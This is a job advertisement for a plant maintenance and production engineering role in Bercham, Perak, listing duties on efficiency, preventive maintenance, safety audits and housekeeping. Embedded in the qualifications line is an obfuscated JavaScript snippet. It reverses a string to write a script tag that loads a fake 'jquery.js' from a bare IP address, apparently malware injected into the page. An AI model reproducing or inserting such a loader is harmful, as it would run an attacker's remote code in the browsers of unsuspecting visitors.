Location: Bercham, Perak
– Continuously monitor daily, weekly and monthly production efficiency and to take immediate countermeasures to ensure that production efficiency is maintained at high level.
– Plan, organise and carry out preventive maintenance on the plant, identify the major downtimes and its root cause(s) and take immediate countermeasures to eliminate plant stoppages.
– Continuously seek and implement cost saving measures and ensure low operating cost for plant and machinery.
– Ensure all machinery are safe and safety procedures are implemented and guidelines are being followed to prevent accidents. In the event of accident, conduct accident investigation and timely submit report. Participate actively in Health, Safety & Environment audits, Factory Image, ISO audits and others.
– Continuously seek improvement on workplace and ensure good housekeeping in the plant.
– Assist Production Executive, Line Manager, Factory Manager and other division managers as and when necessary.
– Carry out any other duties or job functions instructed by superior from time to time.
– Relevant Engineering Diploma or Degree document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to firstname.lastname@example.org